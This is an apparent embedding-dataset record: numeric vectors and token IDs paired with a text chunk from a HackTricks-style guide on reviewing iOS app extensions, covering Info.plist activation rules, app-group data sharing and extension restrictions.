[ 0.6775032877922058, -0.22415438294410706, 0.1168813407421112, 0.8389143943786621, -0.6398413777351379, -0.17555852234363556, -0.004208356142044067, 0.4276846945285797, 0.45663055777549744, 0.28928786516189575, -0.042529840022325516, 0.34933894872665405, 0.5125124454498291, -0.4799690842628479, -0.6831831336021423, -0.4478279650211334, -0.6144518852233887, -0.3241722881793976, -0.9159565567970276, -0.07019219547510147, -0.011565283872187138, 0.34767645597457886, -0.9968475103378296, -0.45150652527809143, -0.3432828187942505, 1.051770806312561, 0.6747134327888489, 0.1970498412847519, 0.9869080781936646, 0.4112515151500702, 0.24155418574810028, -0.18425293266773224, 0.23408114910125732, -0.7575604915618896, -0.04830790311098099, -0.16473102569580078, 1.462784767150879, -0.07687188684940338, -0.05354529991745949, -0.4475109577178955, -0.1577504426240921, -0.1545562893152237, 0.3846229016780853, -0.3872697353363037, -0.9076124429702759, -0.3256973922252655, -0.14304085075855255, -0.2933461666107178, 0.14712072908878326, 0.3808547258377075, 0.5358685255050659, -0.066673144698143, 0.32502394914627075, 0.1436171531677246, 0.3771655261516571, -0.24364030361175537, -0.42177119851112366, 0.0676424577832222, -0.33356723189353943, -0.07745948433876038, -0.45800185203552246, 0.47123393416404724, 0.07160257548093796, -1.1491022109985352, -0.1964569091796875, 0.3286125659942627, 0.18148072063922882, -0.4412272572517395, -0.4112575352191925, -0.7995204925537109, -0.2749234735965729, 0.6807848215103149, -0.6528724431991577, -0.8782456517219543, -0.3093535304069519, -0.30528125166893005, 0.26836445927619934, -0.0692695677280426, -0.11640042066574097, 0.4352199137210846, -0.21188724040985107, 0.6873896718025208, 0.24792224168777466, -0.23892329633235931, -0.6993709802627563, -0.3980424404144287, 1.0503724813461304, 0.4914206266403198, -0.17087596654891968, -0.043439626693725586, 0.24913571774959564, 0.23843973875045776, -0.45684248208999634, -0.8515229225158691, 0.2660209536552429, 0.8854672312736511, -0.2319389283657074, 0.3029707074165344, 0.2380310744047165, -0.017870768904685974, 1.0435044765472412, 0.3116597831249237, 0.28045976161956787, 0.43900978565216064, -0.30692535638809204, 0.48470333218574524, 0.3548164963722229, -0.3655603528022766, -0.49739205837249756, -0.3543883264064789, 0.08738183230161667, -0.3693180978298187, 0.21307051181793213, -0.978080689907074, -0.2850276827812195, 0.249250128865242, 0.18291409313678741, 0.1606961339712143, -0.7079166769981384, 0.7933657169342041, -0.37912723422050476, -0.4593660831451416, 0.34174418449401855, -0.43563854694366455, 0.021588029339909554, -0.04182615876197815, -0.06850112229585648, 0.2448575645685196, -0.5304247736930847, -0.40715351700782776, -0.44259732961654663, -0.22161145508289337, 0.11347974836826324, 0.5074375867843628, -0.2993721067905426, 0.18736541271209717, -0.1689649075269699, 0.07389581203460693, 0.243985116481781, -0.7859059572219849, 0.0409441739320755, 0.3678227663040161, 0.10658594220876694, 1.435497760772705, 0.1546492725610733, -0.2314460128545761, -0.5133754014968872, -0.8455800414085388, -0.13997356593608856, 0.3525048792362213, 0.22533288598060608, 0.36714044213294983, 0.3817040026187897, -0.4132643938064575, -0.6604131460189819, 0.48226451873779297, -0.32219523191452026, 0.6920532584190369, -0.05181657895445824, 0.0988416001200676, -0.21824106574058533, 0.8615169525146484, -0.11906284838914871, 0.5150943994522095, -0.09871574491262436, 0.4751928448677063, -0.5555299520492554, -0.11626946181058884, 0.129837766289711, 0.5737208724021912, 0.15951409935951233, -0.01154300943017006, 0.45455649495124817, 0.45077791810035706, 1.4897879362106323, 1.0749129056930542, 0.20612850785255432, 0.3335304856300354, 0.25110098719596863, 0.23888887465000153, -0.6106045246124268, 0.3839750289916992, 0.16739487648010254, 0.42517417669296265, -0.1985933631658554, 0.25370097160339355, -0.25685006380081177, -0.3089037537574768, -0.33949014544487, -0.7845139503479004, -0.4436044692993164, 0.3024817705154419, -1.090451955795288, 0.6415011882781982, 0.46949389576911926, 0.13556362688541412, -0.7883755564689636, -0.3718924820423126, -0.028489675372838974, -1.6970678567886353, -0.9566968083381653, 0.5377106666564941, -0.1461670994758606, 0.4207060635089874, -0.7125928401947021, -0.3329395353794098, 0.4897814989089966, 0.7660357356071472, -0.3441013693809509, 0.4661221206188202, 0.891231894493103, 0.13964033126831055, -0.6675339937210083, -0.5537276268005371, 0.10518918931484222, -0.2238297015428543, -0.0697077065706253, 0.2138686627149582, -0.1767701953649521, 0.008166962303221226, -0.6521602272987366, 0.39500710368156433, 0.7345137000083923, 0.3511205017566681, -0.06880718469619751, -0.03216516971588135, -0.1482057422399521, 0.6588616371154785, -1.0952750444412231, 0.077433280646801, -0.6193786859512329, 0.7157303690910339, 0.6509748101234436, 1.725124478340149, 0.1123528704047203, 0.05247876048088074, 0.742483913898468, -0.10974859446287155, 0.2553656995296478, -0.09073568880558014, 0.08592931926250458, 1.023497223854065, 0.16939422488212585, 0.3161870837211609, 0.6142990589141846, 0.38337039947509766, 0.3500416874885559, -0.061750736087560654, 0.15834303200244904, 0.46105608344078064, -0.7910575866699219, 1.009020209312439, 0.475841224193573, 0.5867772698402405, -0.8855800032615662, -0.8540993332862854, 0.6303331255912781, 1.25607168674469, -0.4589103162288666, -0.7222974300384521, -0.4666520953178406, -0.5558183193206787, -0.539104163646698, -0.057106200605630875, -0.18168911337852478, 0.41619929671287537, -0.16754232347011566, 0.2668924331665039, -0.3720238208770752, -0.2809780240058899, -0.8057146072387695, -0.13319945335388184, -0.8082529306411743, -0.6691761612892151, -0.8657816648483276, 0.09250646084547043, -0.09656085819005966, -0.6539801359176636, 0.49601516127586365, -0.44550544023513794, -0.3924013674259186, 0.22728364169597626, 0.4951520562171936, 0.49685078859329224, 0.08725211024284363, -0.17701591551303864, -0.8146743774414062, 0.4578944444656372, 0.26268431544303894, 0.7928329706192017, -0.0688028484582901, 0.19307614862918854, -0.013724694028496742, 0.18965154886245728, 0.16999486088752747, -0.717039942741394, 0.3662033975124359, 0.2285911738872528, -0.2335149198770523, -0.23938913643360138, 0.5613816976547241, -0.04333636164665222, 0.773162841796875, -0.2329522669315338, -0.27085500955581665, 0.5945501923561096, 0.3908092677593231, 0.0783466026186943, 0.8901151418685913, 0.7440342903137207, -0.3545284569263458, 0.4626907408237457, 0.019181428477168083, 0.30173438787460327, -0.6228407025337219, 0.22909200191497803, 0.23691314458847046, 0.21295878291130066, -0.5588628649711609, -0.15292151272296906, -0.14908209443092346, -0.35112911462783813, -0.954264760017395, -0.06926512718200684, -0.4479953646659851, 0.30158647894859314, -0.46221673488616943, -1.2155901193618774, 0.6675532460212708, -0.5979279279708862, -0.6330547332763672, -0.43578165769577026, -0.07891469448804855, 0.7986578941345215, -0.1546727567911148, 0.520081639289856, 0.08337346464395523, -0.4288850426673889, 0.3463611304759979, 0.27100032567977905, -0.0675244927406311, -0.5380876064300537, 0.17818942666053772, -0.019200729206204414, 0.04036572575569153, 0.7274741530418396, 0.519231379032135, -0.18879882991313934, 0.0375734381377697, -0.3665733337402344, -0.36831969022750854, 0.15491488575935364, 0.4006025195121765, 0.14303389191627502, 0.5221919417381287, 0.41090309619903564, -0.6106510162353516, -0.15752959251403809, 0.24167416989803314, 0.14083704352378845, 0.31324532628059387, 0.322929322719574, 0.1110682487487793, 0.09799252450466156, 0.04614052549004555, -0.35680073499679565, 0.22629691660404205, 0.19815970957279205, 0.4812726378440857, -0.4740569293498993, 0.6119207143783569, -0.35574477910995483, -0.3491434156894684, 0.8630055785179138, -0.29186299443244934, -0.9154273867607117, 0.5393462181091309, 0.3659725487232208, 0.6573826670646667, -0.5099489092826843, 0.028625797480344772, 0.3386581242084503, 0.13637594878673553, 0.6999024152755737, 0.3600679636001587, 0.13202360272407532, -0.051764171570539474, -0.7566614151000977, 0.19243614375591278, -0.34985440969467163, -0.13841047883033752, 0.22442953288555145, -0.013111460953950882, -0.3628849685192108, -0.4899723529815674, -0.8005850315093994, -0.019104354083538055, 0.6579138040542603, 1.053746223449707, 0.5320157408714294, 0.6751826405525208, 0.2474917769432068, 0.08294914662837982, 0.5740702748298645, 0.041971929371356964, 0.34965819120407104, 0.14693789184093475, 0.7115223407745361, -0.594011127948761, -0.20036934316158295, -0.9047325849533081, -0.38743454217910767, -0.6576632261276245, -0.18078097701072693, 0.3760305941104889, 0.24012824892997742, -0.618240475654602, -0.1974174678325653, 0.004695084877312183, 0.19116905331611633, -0.06225690618157387, 0.06654380261898041, -0.3602878451347351, 0.7408626079559326, 0.7573601603507996, -0.606124222278595, 0.11280212551355362, -0.5766901969909668, -0.07835505157709122, 0.20013126730918884, -0.18118533492088318, -0.35856297612190247, -0.6300095915794373, -0.5939147472381592, -0.3261245787143707, 0.40526527166366577, 0.3785817325115204, -0.0007278844132088125, 0.1829390972852707, -0.9794877767562866, -0.029581625014543533, 0.5012626051902771, -0.4782204329967499, -0.23613311350345612, -0.15441380441188812, 0.43617862462997437, 0.6700788140296936, 0.6062185168266296, -0.014140300452709198, -0.6475419998168945, 0.18335822224617004, -0.267558753490448, 0.5648161172866821, -0.7903260588645935, -0.17702242732048035, 0.28765633702278137, 0.2345724254846573, -0.14115668833255768, -0.06939567625522614, -0.5655547380447388, 0.6597517132759094, 0.29059749841690063, 0.5558046102523804, 0.054141949862241745, -0.286406546831131, 1.2761256694793701, -0.5402452349662781, -0.8331301212310791, 0.6634687781333923, 0.5627230405807495, 0.18178610503673553, -0.0350978747010231, -0.42827415466308594, -0.17092570662498474, 0.5134795904159546, -0.5625723004341125, 0.46683117747306824, 0.2276802361011505, 0.07545287162065506, 0.07136379182338715, -0.8899964094161987, 0.054393865168094635, -0.20243440568447113, -0.06802292168140411, -0.7930272817611694, -0.8107278943061829, 0.006410315167158842, 0.22272178530693054, 0.23453374207019806, 0.7731965184211731, 0.290312796831131, -0.3080808222293854, -0.28644922375679016, -0.11876125633716583, -1.1231223344802856, -0.6314130425453186, -0.23644843697547913, 0.03779556229710579, 0.12568412721157074, 0.13714593648910522, 0.564927875995636, -0.48443883657455444, -0.18452131748199463, 0.6898527145385742, -0.3658255934715271, 0.5935084223747253, -0.8763818144798279, -0.03646170347929001, -0.6034904718399048, 0.09238673001527786, -0.28380510210990906, 0.1273849755525589, -0.2005063146352768, 0.1020611897110939, -0.16809995472431183, 0.5516628623008728, 0.49390077590942383, -0.8462300300598145, -1.162046194076538, 0.4405089020729065, 0.17939890921115875, -0.0050278534181416035, -0.30911481380462646, 0.6240657567977905, 0.06702391058206558, 0.026136107742786407, -0.057890139520168304, -0.06781068444252014, -0.6942104697227478, -0.676573634147644, 0.5001223087310791, -0.09960851073265076, 0.3220485746860504, -0.6415719389915466, -1.0865691900253296, -0.2369503378868103, 0.3609618842601776, 0.19867204129695892, -0.8130573034286499, -0.5536398887634277, 0.058090370148420334, 0.27095890045166016, -0.11712361127138138, -0.1653253138065338, -0.20117592811584473, 0.0757564902305603, 0.01742032915353775, 0.9078322052955627, -0.08386392146348953, -0.31280234456062317, -0.09307575225830078, 0.15241792798042297, 0.5580607652664185, 0.7230690121650696, -0.820186197757721, -0.7879013419151306, 0.1802425980567932, 0.08878567814826965, -0.1298132985830307, 0.5023620128631592, -0.5579721331596375, 0.22132545709609985, -0.24478349089622498, -0.6697620153427124, 0.09642236679792404, -0.013247447088360786, -0.7135357856750488, -0.06298994272947311, 0.37357157468795776, -0.911922037601471, -0.3213373124599457, -0.4330500364303589, 0.6682431697845459, 0.48615846037864685, -0.2949809730052948, -1.0702683925628662, 0.15624397993087769, -0.29671359062194824, -0.9303087592124939, 0.35456618666648865, 0.15804526209831238, 0.1537095457315445, 0.3745991885662079, 0.16214732825756073, 0.05077002942562103, -0.4959729015827179, 0.26245760917663574, 1.287684440612793, -0.022818708792328835, -0.17327448725700378, -0.9606512784957886, 0.730476438999176, 0.023793727159500122, -0.49842971563339233, 0.030668476596474648, -0.27082177996635437, 0.005690287798643112, -0.16545256972312927, -1.181415319442749, -0.07995584607124329, -0.7268266081809998, -0.6141640543937683, 0.24093753099441528, -0.06848897784948349, 0.3116987645626068, 0.43017181754112244, -1.0760303735733032, -0.10254950821399689, 0.3847324252128601, -0.3400619626045227, -0.023952815681695938, 0.4354613721370697, 0.6687704920768738, -0.054727472364902496, -0.1374664008617401, -0.10155442357063293, 0.21888931095600128, -0.20705120265483856, 0.6022152304649353, -0.03327057138085365, -0.5346824526786804, 1.1575450897216797, 0.8117795586585999, -0.6924914717674255, -0.060743022710084915, 0.08270581066608429, -0.7506111264228821, 0.10527918487787247, -0.47397515177726746, -0.32390132546424866, 0.39173823595046997, -0.23525334894657135, 0.2387814074754715, 0.3936086893081665, 0.1538577824831009, 0.4061918556690216, -0.1598091721534729, 1.1571416854858398, 0.3061601519584656, 0.26192396879196167, 0.5995292067527771, -0.9119696617126465, -0.1350366473197937, -0.509193480014801, -0.13799452781677246, -0.38255155086517334, 0.09931589663028717, 0.8275265097618103, -0.38944166898727417, 0.14570897817611694, 0.15491406619548798, 0.2982638478279114, 0.5054224133491516, -0.0487988106906414, 0.38316085934638977, 0.9254311919212341, 0.10752523690462112, -0.5389213562011719, -0.2568119466304779, 0.373035192489624, -0.44002655148506165, 0.5619413256645203, -0.2669857442378998, -0.08220172673463821, -0.2692722976207733, 0.2622247636318207, 0.35016128420829773, -1.0894821882247925, -0.6651352643966675, -1.0229098796844482, -0.18692505359649658, 0.25187116861343384, -0.5245156288146973, 0.03186367452144623, 0.49898678064346313, -0.11078588664531708, -0.6571488380432129, -0.848296046257019, 0.45735394954681396, -0.847855269908905, -0.14295044541358948, -0.9983652830123901, 0.7832050323486328, -0.9686002135276794, -0.40706780552864075, -0.3538208305835724, 0.19773371517658234, -0.5032831430435181, -0.7566645741462708, -0.48578810691833496, 0.1808621734380722, -0.22979243099689484, 0.4743501543998718, -0.8046022057533264, -0.12284577637910843, 0.0226579662412405, -0.6889790892601013, 0.10994505882263184, 1.1002800464630127, -0.4325611889362335, -0.1613086462020874, 0.26419922709465027, -0.13121195137500763, 0.24455514550209045, -0.6031428575515747, -0.1870564967393875, -0.41155505180358887, 0.13987354934215546, 0.23696859180927277, 0.42201632261276245, -0.5541964173316956, 0.0804855078458786, 0.2299744188785553, -1.08657705783844, -0.43932706117630005, -0.4856891632080078, -0.14843280613422394, 0.7443366646766663, -0.0485474094748497, 0.37751173973083496, 0.874645471572876, 0.597632884979248, 0.5061432719230652, -0.7698156237602234, 0.35745713114738464, 0.23508213460445404, 0.12160907685756683, 0.3094211518764496, -0.021131491288542747, -0.4577847421169281, -0.6811721920967102, -0.08863328397274017, 0.3168387711048126, -0.2040269821882248, 0.2851036787033081, -0.1480223834514618, -0.07732822000980377, -0.7446350455284119, 0.08038187772035599, 0.8772643208503723, 0.42068561911582947, 0.3796108663082123, 0.02423364669084549, 0.5409709811210632, 0.013216622173786163, -0.262163907289505, 0.09581466764211655, -1.109216332435608, -0.4512843191623688, 0.4852473735809326, -0.1450885385274887, -0.22365021705627441, -0.5561802387237549, -0.5028411149978638, 0.14727577567100525, -0.06372442096471786, -0.3837335407733917, 0.3758198320865631, 0.7601439952850342, -0.11059277504682541, 1.19033944606781, 0.0016124253161251545, -0.5386986136436462, -0.4811146557331085, 0.22523342072963715, -1.1895936727523804, -1.0641779899597168, 0.505455732345581, 0.74598628282547, 0.17620013654232025, -0.3709384500980377, -0.45556867122650146, 0.6178086400032043, 0.38836655020713806, 0.0692618191242218, 0.16798508167266846, 0.3539169430732727, -0.31746506690979004, 0.5641310811042786, -0.3841884732246399, 0.4149583578109741, -0.3732934296131134, 0.1942175179719925, 0.14689171314239502, -0.42258092761039734, -0.4010789394378662, 0.2778266370296478, 0.7066033482551575, -0.269022136926651, 0.5522429347038269, 0.6984644532203674, 0.5589179396629333, -0.2810838520526886, 0.15852923691272736, 0.2121843546628952, 0.151021346449852, 0.6877263784408569, 0.1538558453321457, -0.6293660402297974, 0.8898712992668152, 0.8987413048744202, -0.09238985180854797, -0.45620089769363403, 0.5989697575569153, 0.07369314879179001, -0.3216487467288971, 0.31921693682670593, 0.015813248232007027, -0.3456043303012848, 0.2166702151298523, -0.4757727086544037, -0.01750933937728405, 0.33802831172943115, 0.22218404710292816, 0.12084449082612991, -0.19564755260944366, 0.7289748191833496, -0.8928613066673279, 0.22701393067836761, 0.311718612909317, 0.5817248225212097, -0.009617442265152931, -0.2182186096906662, -0.27030304074287415, 0.31812015175819397, 0.9008375406265259, 0.32966697216033936, 0.1531764268875122, 0.5416529178619385, -0.736897885799408, 0.3840094804763794, 0.06433851271867752, -0.4482341706752777, -1.0541386604309082, 0.22492779791355133, 0.2710397243499756, -0.17217686772346497, -0.7308387756347656, 0.029662955552339554, 0.3631729185581207, -0.3227299451828003, 0.5040018558502197, -0.25043147802352905, -0.21251164376735687, -0.9151971340179443, 0.10098233073949814, -0.449003666639328, -0.001336040673777461, 0.31318140029907227, -0.7657855153083801, -0.5934545397758484, 0.8893954753875732, 0.07819346338510513, 0.35839274525642395, 0.28755590319633484, 0.7758575677871704, 0.045308008790016174, 0.8735743761062622, 0.5136085748672485, -0.3918840289115906, -0.4495885968208313, 0.13097113370895386, -0.06726618856191635, -0.29364514350891113, 0.17227637767791748, -0.21133798360824585, 0.9392000436782837, -0.35991230607032776, -0.36779433488845825, -0.5817331671714783, 0.14564141631126404, -0.4164001941680908, -1.0377620458602905, 0.057233430445194244, 0.2876967489719391, -0.3324984610080719, -0.014027312397956848, 0.46724966168403625, 0.33797356486320496, 0.412352979183197, -0.3091008961200714, -0.5252736210823059, -0.6850699186325073, -0.32553112506866455, 0.2773578464984894, 0.8760861754417419, -0.5033705234527588, -0.255108505487442, 0.23718811571598053, -0.9351741671562195, -0.5650463700294495, -0.21546614170074463, -0.13496741652488708, -0.1568559855222702, 0.5009968876838684, 0.6084889769554138, 0.28666752576828003, 0.3656237721443176, -0.4494568705558777, -0.25864118337631226, -0.055703822523355484, 0.7114178538322449, -0.36057034134864807, 0.8791887760162354, 0.4666045606136322, 0.3616940677165985, 0.44005194306373596, -0.5558154582977295, 0.3174455463886261, -0.0006973404670134187, 0.14764268696308136, 0.022439351305365562, -0.04029544070363045, -0.6415179967880249, -0.14469638466835022, 0.0297252107411623, 0.11403700709342957, 0.17437505722045898, 0.11469876021146774, -1.2421197891235352, 0.12833157181739807, -0.824524998664856, 0.4074566066265106, -0.309357613325119, 0.12662959098815918, 0.5186562538146973, -0.1844211369752884, 0.3756007254123688, -0.94367516040802, 4.3305583000183105, 0.6800069212913513, 0.20090259611606598, -0.08526846766471863, 0.5344820022583008, 0.3631730079650879, 1.6075143814086914, -1.0110712051391602, 0.7645169496536255, -0.2994351387023926, 0.7109047174453735, -0.05222460255026817, 0.4026058316230774, 0.41552820801734924, 0.7028220891952515, 0.2844490110874176, -0.43456754088401794, 0.22308890521526337, 0.42571529746055603, -0.7761409282684326, -1.1303919553756714, -0.09157361835241318, 0.13434676826000214, 0.8279512524604797, 0.37049174308776855, 0.17358537018299103, 0.42845413088798523, -0.35058948397636414, -0.019669607281684875, -0.7897131443023682, 0.042875900864601135, -0.7341935038566589, 0.1582762598991394, -0.32374507188796997, -0.6981626152992249, 0.1003790870308876, -0.22028031945228577, -1.5351262092590332, -0.3646148145198822, 0.4120585024356842, 0.029207438230514526, -0.07076594978570938, 0.1353495568037033, -0.49713271856307983, 0.18950632214546204, 0.5825899839401245, -0.36236584186553955, 0.19974234700202942, 0.91544508934021, -1.2629860639572144, 0.3670491874217987, 0.08391682803630829, 0.5175379514694214, 0.023306740447878838, -0.9720584154129028, -0.22374781966209412, 0.615932285785675, -0.3732700049877167, 0.0668056532740593, 0.1735270619392395, 0.31110209226608276, -0.11193934082984924, -0.043206337839365005, -0.02572661079466343, -0.7731661796569824, 0.2641633450984955, -0.27490320801734924, 0.7575105428695679, -0.09005288779735565, -0.34164318442344666, -0.17215169966220856, -0.11043890565633774, -0.4940531253814697, -0.37663552165031433, 0.8612397313117981, 0.14584718644618988, -0.09772856533527374, 0.22922302782535553, 0.12102076411247253, -0.6315125226974487, -0.2663193345069885, -0.21379989385604858, -1.041551947593689, 0.1507698893547058, 0.7033868432044983, 0.7897410988807678, -0.3152977526187897, -0.8183823823928833, 0.09692592918872833, 0.37314116954803467, 0.43454504013061523, 0.11456240713596344, -0.5585906505584717, 0.09010857343673706, -0.10689940303564072 ]
[ 1996, 10439, 14012, 1006, 24531, 2030, 5361, 10439, 1007, 1024, 1002, 24665, 13699, 1011, 17212, 24978, 10288, 29048, 8400, 5178, 16778, 8873, 2121, 18093, 1013, 23921, 1032, 1060, 1012, 10439, 1013, 12441, 5371, 18093, 1013, 23921, 1060, 1012, 10439, 1013, 1013, 13354, 7076, 1013, 2909, 6137, 10111, 7666, 1012, 10439, 10288, 1013, 18558, 1012, 20228, 2923, 3503, 21114, 2854, 5371, 18093, 1013, 23921, 1060, 1012, 10439, 1013, 1013, 13354, 7076, 1013, 3745, 1012, 10439, 10288, 1013, 18558, 1012, 20228, 2923, 3503, 21114, 2854, 5371, 18093, 1013, 23921, 1060, 1012, 10439, 1013, 1013, 13354, 7076, 1013, 26828, 8663, 6528, 2102, 1012, 10439, 10288, 1013, 18558, 1012, 20228, 2923, 3503, 21114, 2854, 5371, 18093, 1013, 23921, 1060, 1012, 10439, 1013, 1013, 13354, 7076, 1013, 15536, 24291, 1012, 10439, 10288, 1013, 18558, 1012, 20228, 2923, 3503, 21114, 2854, 5371, 18093, 1013, 23921, 1060, 1012, 10439, 1013, 1013, 3422, 1013, 3422, 1012, 10439, 1013, 13354, 7076, 1013, 3422, 5331, 1012, 10439, 10288, 1013, 18558, 1012, 20228, 2923, 3503, 29337, 2064, 2036, 3229, 2566, 7020, 2232, 1010, 2424, 1996, 10439, 14012, 1998, 2862, 2035, 2503, 13354, 7076, 1006, 2027, 2024, 2872, 2045, 2011, 12398, 1007, 2030, 2079, 2009, 2007, 22224, 1024, 6887, 1012, 10093, 13910, 2527, 1012, 10013, 2006, 1006, 18059, 1024, 2340, 1012, 1015, 1012, 1016, 1007, 1031, 18833, 1033, 1001, 3729, 13354, 7076, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 2321, 2063, 2575, 2050, 27814, 2546, 1011, 1015, 3540, 2581, 1011, 4008, 2050, 2549, 1011, 1037, 2683, 2063, 2692, 1011, 1020, 3540, 27531, 2497, 26187, 7011, 19481, 1013, 23921, 1060, 1012, 10439, 1013, 13354, 7076, 8458, 1012, 10093, 13910, 2527, 1012, 10013, 2006, 1006, 18059, 1024, 2340, 1012, 1015, 1012, 1016, 1007, 1031, 18833, 1033, 1001, 1048, 2015, 3619, 8873, 7485, 18863, 2566, 5244, 24978, 8873, 2571, 21572, 26557, 3508, 3191, 4339, 2171, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 14176, 4749, 2509, 3904, 2995, 6270, 26828, 8663, 6528, 2102, 1012, 10439, 10288, 4305, 2890, 16761, 2100, 4749, 2509, 3904, 2995, 6270, 15536, 24291, 1012, 10439, 10288, 4305, 2890, 16761, 2100, 4749, 2509, 3904, 2995, 6270, 3745, 1012, 10439, 10288, 4305, 2890, 16761, 2100, 4749, 2509, 3904, 2995, 6270, 2909, 6137, 10111, 7666, 1012, 10439, 10288, 8545, 2064, 2156, 2085, 1996, 2168, 2176, 10439, 14305, 2008, 2057, 2387, 1999, 1060, 16044, 2077, 1012, 12515, 1996, 3569, 2951, 4127, 15222, 2015, 2003, 2590, 2005, 2951, 2108, 4207, 2007, 3677, 18726, 1006, 1041, 1012, 1043, 1012, 3081, 3745, 2030, 2895, 14305, 1007, 1012, 2043, 1996, 5310, 27034, 2070, 2951, 2828, 1999, 1037, 3677, 10439, 1998, 2009, 3503, 1996, 2951, 4127, 9375, 2182, 1010, 1996, 3677, 10439, 2097, 3749, 1996, 5331, 1012, 2009, 2003, 4276, 15103, 1996, 4489 ]
hack_tricks
434.txt
1
between this and data sharing via uiactivity where we had to define the document types, also using utis. an app does not need to have an extension for that. it is possible to share data using only uiactivity. inspect the app extension's info. plist file and search for nsextensionactivationrule. that key specifies the data being supported as well as e. g. maximum of items supported. for example : < key > nsextensionattributes < / key > < dict > < key > nsextensionactivationrule < / key > < dict > < key > nsextensionactivationsupportsimagewithmaxcount < / key > < integer > 10 < / integer > < key > nsextensionactivationsupportsmoviewithmaxcount < / key > < integer > 1 < / integer > < key > nsextensionactivationsupportsweburlwithmaxcount < / key > < integer > 1 < / integer > < / dict > < / dict > only the data types present here and not having 0 as maxcount will be supported. however, more complex filtering is possible by using a so - called predicate string that will evaluate the utis given. please refer to the apple app extension programming guide for more detailed information about this. checking data sharing with the containing appremember that app extensions and their containing apps don't have direct access to each other ’ s containers. however, data sharing can be enabled. this is done via " app groups " and the nsuserdefaults api. see this figure from apple app extension programming guide : as also mentioned in the guide, the app must set up a shared container if the app extension uses the nsurlsession class to perform a background upload or download, so that both the extension and its containing app can access the transferred data. verifying if the app restricts the use of app extensionsit is possible to reject a specific type of app extension by using the following method : application : shouldallowextensionpointidentifier : however, it is currently only possible for " custom keyboard " app extensions ( and should be verified when testing apps handling sensitive data via the keyboard like e. g. banking apps ). dynamic analysisfor the dynamic analysis we can do the following to gain knowledge without having the source code : inspecting the items being sharedidentifying the app extensions involved
[ 0.18592917919158936, -0.4231327772140503, 0.2668750286102295, 0.7640275955200195, -0.7037818431854248, 0.6679239869117737, 0.7807645797729492, 0.04236795753240585, 0.7488536834716797, 0.8784412145614624, -0.3255390524864197, 0.300324410200119, 0.24387672543525696, -0.30551689863204956, -0.36933639645576477, -0.003998875617980957, -0.8757181763648987, 0.09398675709962845, -0.7556600570678711, -0.317451536655426, 0.35805121064186096, 0.18021062016487122, -0.6825811266899109, -0.7652795910835266, -0.2838859260082245, 0.6153774261474609, 0.36377134919166565, 0.12266793102025986, 0.7329800128936768, 1.065645456314087, 0.16624918580055237, -0.12693248689174652, -0.13282382488250732, -0.40845295786857605, -0.26511210203170776, 0.09902716428041458, 0.9532937407493591, -0.10901891440153122, 0.23819398880004883, -0.3299543261528015, 0.17050708830356598, -0.3770107328891754, 0.568055272102356, -0.38870659470558167, -0.42834246158599854, -0.04356761276721954, -0.006889868527650833, -0.397531121969223, 0.3179841935634613, -0.16068445146083832, 0.7276399731636047, -0.21981464326381683, -0.2496310919523239, 0.12820248305797577, 0.4385754466056824, -0.18084435164928436, -0.20665346086025238, -0.018727952614426613, -0.08790799230337143, 0.6043499112129211, -0.254715234041214, 0.10462994873523712, 0.3583212196826935, -0.6589016318321228, 0.15382206439971924, 0.4704803228378296, -0.6366569995880127, -0.304568886756897, -0.03692011535167694, -0.09481360763311386, 0.20324070751667023, 0.5709642171859741, -0.756630003452301, -0.8453755974769592, -0.2792775630950928, -0.005143025889992714, -0.08716756850481033, -0.220084547996521, -0.0004644494620151818, 0.5967807173728943, -0.02084355056285858, 0.8248185515403748, 0.34841278195381165, 0.11456534266471863, -0.785830557346344, -0.21358522772789001, 0.10755104571580887, 0.45901817083358765, 0.18088926374912262, -0.06341283023357391, 0.2924990653991699, 0.23194493353366852, -0.5332364439964294, -0.6534680128097534, 0.5807406306266785, 0.6285123229026794, -0.5742936730384827, 0.5313429832458496, 0.20987865328788757, 0.05354362726211548, 0.8130674958229065, 0.5173216462135315, 0.41558822989463806, 0.3686388432979584, -0.43577539920806885, 0.6433303952217102, 0.14113284647464752, -0.00421398738399148, -0.21906767785549164, -0.2930682897567749, 0.14146971702575684, -0.005818730685859919, 0.7932592630386353, -0.9132283329963684, -0.12008011341094971, 0.3971165120601654, -0.06256371736526489, 0.35911187529563904, -0.5344048738479614, 0.6639542579650879, 0.021166138350963593, -0.14849188923835754, 0.12370160967111588, -0.04567035287618637, 0.15156283974647522, 0.15060542523860931, 0.6938181519508362, 0.3854149281978607, -0.1330772191286087, -0.2500093877315521, -0.38995516300201416, -0.5298823714256287, -0.10783055424690247, 1.1011090278625488, -0.42247825860977173, -0.15560360252857208, 0.6531890034675598, 0.5144419074058533, 0.41000401973724365, -0.6099019050598145, -0.14116807281970978, 0.26824843883514404, -0.060711272060871124, 0.9702521562576294, 0.449911504983902, 0.21602211892604828, -0.48237794637680054, -0.940994918346405, -0.1615758240222931, 0.2430734485387802, -0.02638866938650608, 0.8978362083435059, 0.5704429745674133, -0.6755454540252686, -0.6445808410644531, 0.31125545501708984, -0.7301804423332214, 0.37838247418403625, -0.00389650696888566, 0.03099166415631771, -0.4807918071746826, 0.6267363429069519, 0.1793234795331955, -0.13715530931949615, -0.3159555494785309, 0.34634625911712646, -0.714461088180542, -0.32712289690971375, -0.015562891028821468, 0.47460445761680603, 0.23410260677337646, -0.009799723513424397, -0.11778442561626434, 0.297349214553833, 0.8198414444923401, 1.1382904052734375, 0.34007275104522705, -0.22555790841579437, -0.03239089995622635, 0.29402846097946167, -0.3174428343772888, -0.05069055035710335, 0.5112318396568298, 0.7716981768608093, -0.6707672476768494, 0.5269272923469543, -0.3651224374771118, -0.4561809301376343, -0.13525301218032837, -0.11687590181827545, -0.3154882490634918, 0.1510516107082367, -0.7645036578178406, 0.5952568054199219, 0.6591008305549622, -0.019494423642754555, -1.0108075141906738, -0.1532968133687973, 0.03452207148075104, -1.0680789947509766, -0.8822084069252014, 0.3964430093765259, -0.17266780138015747, 0.5955732464790344, -0.2961511015892029, -0.21322059631347656, -0.06678321957588196, 